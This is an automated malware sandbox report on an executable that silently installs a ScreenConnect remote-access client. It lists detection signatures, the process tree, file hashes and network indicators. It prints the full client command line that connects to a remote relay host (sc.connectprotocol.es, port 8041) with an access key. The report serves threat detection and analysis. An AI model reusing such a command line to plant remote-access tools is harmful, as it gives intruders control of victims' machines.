
Windows Analysis Report
f53WqfzzNt.exe

Overview

General Information

Sample name: f53WqfzzNt.exe
(renamed because the original name is a hash value)
Original sample name: 5fe1ed17626c02fd6b85cc7e02d20e7f68271ca1dff97855785cf58b9b0d0e57.exe
Analysis ID: 1567469
MD5: a27847506c27a6bde1a5f7d092bf29d2
SHA1: 5857ffbb63987615da9ea0ffc0e5564e257d7729
SHA256: 5fe1ed17626c02fd6b85cc7e02d20e7f68271ca1dff97855785cf58b9b0d0e57
Tags: ConnectWiseexescreen-connectprotocol-essigneduser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score: 46
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 32
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • f53WqfzzNt.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\f53WqfzzNt.exe" MD5: A27847506C27A6BDE1A5F7D092BF29D2)
    • msiexec.exe (PID: 7552 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7588 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7636 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 247D8C2517E6E69F0B3D03A8794ECC06 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7680 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5161843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7764 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E58C0E678653AE880B7CA7B7ACABB13E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6B1ED9B9CEA69D2B0631C700B5D80215 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7856 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=5b6ef70d-09c3-4123-8987-219271e6483f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=GOLDEN-TEAM-001" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7924 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "e3ab8850-6564-49da-aa7c-f9fea2857c14" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 8116 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "91491e11-89f3-4d65-94f1-b87642885275" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • svchost.exe (PID: 8060 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author
f53WqfzzNt.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

Source | Rule | Description | Author
C:\Windows\Temp\~DFCC421647BED1434B.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Windows\Temp\~DFCD8E0A85204A1AE0.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Windows\Temp\~DFE92FC617A28FB7B7.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Windows\Temp\~DF8EE2806658991912.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Windows\Temp\~DF61A468A6AB3D1920.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

Source | Rule | Description | Author
00000000.00000002.1747609157.0000000005A90000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

Source | Rule | Description | Author
0.2.f53WqfzzNt.exe.5a90000.9.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
8.0.ScreenConnect.WindowsClient.exe.e60000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
8.2.ScreenConnect.WindowsClient.exe.316fa10.0.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
0.2.f53WqfzzNt.exe.5a90000.9.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
10.2.ScreenConnect.WindowsClient.exe.23bfa50.3.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

System Summary

Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8060, ProcessName: svchost.exe
                                  No Suricata rule has matched


                                  AV Detection

Source: f53WqfzzNt.exe | ReversingLabs: Detection: 26%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 93.0% probability
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_03991738 CryptProtectData,7_2_03991738
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_03991730 CryptProtectData,7_2_03991730
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_05211504 CryptUnprotectData,7_2_05211504
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_05212FA0 CryptUnprotectData,7_2_05212FA0
Source: C:\Users\user\Desktop\f53WqfzzNt.exe | EXE: msiexec.exe

                                  Compliance

Source: C:\Users\user\Desktop\f53WqfzzNt.exe | EXE: msiexec.exe
Source: f53WqfzzNt.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: f53WqfzzNt.exe | Static PE information: certificate valid
Source: f53WqfzzNt.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: f53WqfzzNt.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: f53WqfzzNt.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: f53WqfzzNt.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: f53WqfzzNt.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829810694.0000000002312000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829695484.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: f53WqfzzNt.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1769116462.0000000000C0D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: f53WqfzzNt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1742512877.0000000004430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: f53WqfzzNt.exe, 4ec961.msi.2.dr, MSICBE0.tmp.2.dr, MSICFCA.tmp.2.dr, 4ec95f.msi.2.dr, MSICBF0.tmp.2.dr, ScreenConnect.ClientSetup.msi.0.dr, 4ec960.rbs.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: f53WqfzzNt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: f53WqfzzNt.exe, 4ec961.msi.2.dr, MSIC2F6.tmp.1.dr, 4ec95f.msi.2.dr, ScreenConnect.ClientSetup.msi.0.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1837827239.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1837827239.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: f53WqfzzNt.exe
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\svchost.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:

                                  Networking

Source: C:\Windows\System32\msiexec.exe | Registry value created: NULL Service
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 38.69.12.167:8041
Source: Joe Sandbox View | IP Address: 38.69.12.167
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: sc.connectprotocol.es
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000009.00000002.3446163571.000001859C093000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: svchost.exe, 00000009.00000003.1801728222.000001859BE68000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000009.00000003.1801728222.000001859BE68000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000009.00000003.1801728222.000001859BE68000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000009.00000003.1801728222.000001859BE9D000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.9.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: f53WqfzzNt.exe, 00000000.00000002.1727538810.0000000003151000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3577508560.0000000001719000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | String found in binary or memory: http://wixtoolset.org/releases/
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
